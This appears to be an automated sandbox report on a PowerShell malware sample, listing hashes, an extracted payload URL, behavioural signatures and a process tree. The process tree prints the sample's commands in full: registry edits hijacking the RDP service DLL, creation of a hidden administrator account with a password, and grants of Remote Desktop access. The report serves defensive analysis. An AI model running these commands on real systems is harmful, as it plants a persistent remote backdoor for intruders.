Analysis
-
max time kernel
19s -
max time network
114s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
18-08-2021 13:28
Static task
static1
Behavioral task
behavioral1
Sample
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
Resource
win7v20210410
Behavioral task
behavioral2
Sample
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
Resource
win10v20210410
General
-
Target
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1
-
Size
2.6MB
-
MD5
35c34f487155cf7fc72c3146bfa1a016
-
SHA1
7ee148a4481dcbaba8e63235356f931243f30b37
-
SHA256
b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfacff1fd5d
-
SHA512
188daeb03aa63c289649f45ead6f7d66d20d9549ed673c4449bc5b353b992654de78d114f784bf7f582a12daf029084e21123fff57e5318188de650d7099c32b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 16 2824 powershell.exe 18 2824 powershell.exe 19 2824 powershell.exe 20 2824 powershell.exe 22 2824 powershell.exe 24 2824 powershell.exe 26 2824 powershell.exe 28 2824 powershell.exe 30 2824 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 3236 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 2004 2004 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_21np3wcj.kgz.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI671C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI676D.tmp powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI673C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI674D.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_c42vl31h.kva.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI677E.tmp powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3236 powershell.exe 3236 powershell.exe 3236 powershell.exe 1248 powershell.exe 1248 powershell.exe 1248 powershell.exe 4016 powershell.exe 4016 powershell.exe 4016 powershell.exe 3796 powershell.exe 3796 powershell.exe 3796 powershell.exe 3236 powershell.exe 3236 powershell.exe 3236 powershell.exe 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 612 612 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3236 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeIncreaseQuotaPrivilege 1248 powershell.exe Token: SeSecurityPrivilege 1248 powershell.exe Token: SeTakeOwnershipPrivilege 1248 powershell.exe Token: SeLoadDriverPrivilege 1248 powershell.exe Token: SeSystemProfilePrivilege 1248 powershell.exe Token: SeSystemtimePrivilege 1248 powershell.exe Token: SeProfSingleProcessPrivilege 1248 powershell.exe Token: SeIncBasePriorityPrivilege 1248 powershell.exe Token: SeCreatePagefilePrivilege 1248 powershell.exe Token: SeBackupPrivilege 1248 powershell.exe Token: SeRestorePrivilege 1248 powershell.exe Token: SeShutdownPrivilege 1248 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeSystemEnvironmentPrivilege 1248 powershell.exe Token: SeRemoteShutdownPrivilege 1248 powershell.exe Token: SeUndockPrivilege 1248 powershell.exe Token: SeManageVolumePrivilege 1248 powershell.exe Token: 33 1248 powershell.exe Token: 34 1248 powershell.exe Token: 35 1248 powershell.exe Token: 36 1248 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeIncreaseQuotaPrivilege 4016 powershell.exe Token: SeSecurityPrivilege 4016 powershell.exe Token: SeTakeOwnershipPrivilege 4016 powershell.exe Token: SeLoadDriverPrivilege 4016 powershell.exe Token: SeSystemProfilePrivilege 4016 powershell.exe Token: SeSystemtimePrivilege 4016 powershell.exe Token: SeProfSingleProcessPrivilege 4016 powershell.exe Token: SeIncBasePriorityPrivilege 4016 powershell.exe Token: SeCreatePagefilePrivilege 4016 powershell.exe Token: SeBackupPrivilege 4016 powershell.exe Token: SeRestorePrivilege 4016 powershell.exe Token: SeShutdownPrivilege 4016 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeSystemEnvironmentPrivilege 4016 powershell.exe Token: SeRemoteShutdownPrivilege 4016 powershell.exe Token: SeUndockPrivilege 4016 powershell.exe Token: SeManageVolumePrivilege 4016 powershell.exe Token: 33 4016 powershell.exe Token: 34 4016 powershell.exe Token: 35 4016 powershell.exe Token: 36 4016 powershell.exe Token: SeDebugPrivilege 3796 powershell.exe Token: SeIncreaseQuotaPrivilege 3796 powershell.exe Token: SeSecurityPrivilege 3796 powershell.exe Token: SeTakeOwnershipPrivilege 3796 powershell.exe Token: SeLoadDriverPrivilege 3796 powershell.exe Token: SeSystemProfilePrivilege 3796 powershell.exe Token: SeSystemtimePrivilege 3796 powershell.exe Token: SeProfSingleProcessPrivilege 3796 powershell.exe Token: SeIncBasePriorityPrivilege 3796 powershell.exe Token: SeCreatePagefilePrivilege 3796 powershell.exe Token: SeBackupPrivilege 3796 powershell.exe Token: SeRestorePrivilege 3796 powershell.exe Token: SeShutdownPrivilege 3796 powershell.exe Token: SeDebugPrivilege 3796 powershell.exe Token: SeSystemEnvironmentPrivilege 3796 powershell.exe Token: SeRemoteShutdownPrivilege 3796 powershell.exe Token: SeUndockPrivilege 3796 powershell.exe Token: SeManageVolumePrivilege 3796 powershell.exe Token: 33 3796 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
powershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.execmd.exedescription pid process target process PID 3236 wrote to memory of 3728 3236 powershell.exe csc.exe PID 3236 wrote to memory of 3728 3236 powershell.exe csc.exe PID 3728 wrote to memory of 2936 3728 csc.exe cvtres.exe PID 3728 wrote to memory of 2936 3728 csc.exe cvtres.exe PID 3236 wrote to memory of 1248 3236 powershell.exe powershell.exe PID 3236 wrote to memory of 1248 3236 powershell.exe powershell.exe PID 3236 wrote to memory of 4016 3236 powershell.exe powershell.exe PID 3236 wrote to memory of 4016 3236 powershell.exe powershell.exe PID 3236 wrote to memory of 3796 3236 powershell.exe powershell.exe PID 3236 wrote to memory of 3796 3236 powershell.exe powershell.exe PID 3236 wrote to memory of 2316 3236 powershell.exe reg.exe PID 3236 wrote to memory of 2316 3236 powershell.exe reg.exe PID 3236 wrote to memory of 2928 3236 powershell.exe reg.exe PID 3236 wrote to memory of 2928 3236 powershell.exe reg.exe PID 3236 wrote to memory of 3712 3236 powershell.exe reg.exe PID 3236 wrote to memory of 3712 3236 powershell.exe reg.exe PID 3236 wrote to memory of 3212 3236 powershell.exe net.exe PID 3236 wrote to memory of 3212 3236 powershell.exe net.exe PID 3212 wrote to memory of 2288 3212 net.exe net1.exe PID 3212 wrote to memory of 2288 3212 net.exe net1.exe PID 3236 wrote to memory of 1172 3236 powershell.exe cmd.exe PID 3236 wrote to memory of 1172 3236 powershell.exe cmd.exe PID 1172 wrote to memory of 3932 1172 cmd.exe cmd.exe PID 1172 wrote to memory of 3932 1172 cmd.exe cmd.exe PID 3932 wrote to memory of 3848 3932 cmd.exe net.exe PID 3932 wrote to memory of 3848 3932 cmd.exe net.exe PID 3848 wrote to memory of 3524 3848 net.exe net1.exe PID 3848 wrote to memory of 3524 3848 net.exe net1.exe PID 3236 wrote to memory of 2316 3236 powershell.exe cmd.exe PID 3236 wrote to memory of 2316 3236 powershell.exe cmd.exe PID 2316 wrote to memory of 3952 2316 cmd.exe cmd.exe PID 2316 wrote to memory of 3952 2316 cmd.exe cmd.exe PID 3952 wrote to memory of 1472 3952 cmd.exe net.exe PID 3952 wrote to memory of 1472 3952 cmd.exe net.exe PID 1472 wrote to memory of 2144 1472 net.exe net1.exe PID 1472 wrote to memory of 2144 1472 net.exe net1.exe PID 3260 wrote to memory of 1240 3260 cmd.exe net.exe PID 3260 wrote to memory of 1240 3260 cmd.exe net.exe PID 1240 wrote to memory of 1236 1240 net.exe net1.exe PID 1240 wrote to memory of 1236 1240 net.exe net1.exe PID 1584 wrote to memory of 196 1584 cmd.exe net.exe PID 1584 wrote to memory of 196 1584 cmd.exe net.exe PID 196 wrote to memory of 3732 196 net.exe net1.exe PID 196 wrote to memory of 3732 196 net.exe net1.exe PID 2808 wrote to memory of 636 2808 cmd.exe net.exe PID 2808 wrote to memory of 636 2808 cmd.exe net.exe PID 636 wrote to memory of 1612 636 net.exe net1.exe PID 636 wrote to memory of 1612 636 net.exe net1.exe PID 184 wrote to memory of 2712 184 cmd.exe net.exe PID 184 wrote to memory of 2712 184 cmd.exe net.exe PID 2712 wrote to memory of 2064 2712 net.exe net1.exe PID 2712 wrote to memory of 2064 2712 net.exe net1.exe PID 2132 wrote to memory of 3152 2132 cmd.exe net.exe PID 2132 wrote to memory of 3152 2132 cmd.exe net.exe PID 3152 wrote to memory of 1584 3152 net.exe net1.exe PID 3152 wrote to memory of 1584 3152 net.exe net1.exe PID 2932 wrote to memory of 1940 2932 cmd.exe net.exe PID 2932 wrote to memory of 1940 2932 cmd.exe net.exe PID 1940 wrote to memory of 3848 1940 net.exe net1.exe PID 1940 wrote to memory of 3848 1940 net.exe net1.exe PID 1240 wrote to memory of 2968 1240 cmd.exe WMIC.exe PID 1240 wrote to memory of 2968 1240 cmd.exe WMIC.exe PID 2164 wrote to memory of 3932 2164 cmd.exe WMIC.exe PID 2164 wrote to memory of 3932 2164 cmd.exe WMIC.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps11⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\owrprf52\owrprf52.cmdline"2⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E3A.tmp" "c:\Users\Admin\AppData\Local\Temp\owrprf52\CSCC09036E78B6840F593AE87398C96D5AC.TMP"3⤵PID:2936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3796 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f2⤵PID:2316
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f2⤵
- Modifies registry key
PID:2928 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f2⤵PID:3712
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add2⤵
- Suspicious use of WriteProcessMemory
PID:3212 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:2288
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr2⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\cmd.execmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\system32\net.exenet start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr5⤵PID:3524
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService2⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\cmd.execmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\system32\net.exenet start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService5⤵PID:2144
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f2⤵PID:932
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f2⤵PID:2132
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1236
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc JlKWUXry /add1⤵
- Suspicious use of WriteProcessMemory
PID:1584 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc JlKWUXry /add2⤵
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc JlKWUXry /add3⤵PID:3732
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1612
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:184 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:2064
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1584
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc JlKWUXry1⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc JlKWUXry2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc JlKWUXry3⤵PID:3848
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:2968
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:3932
-
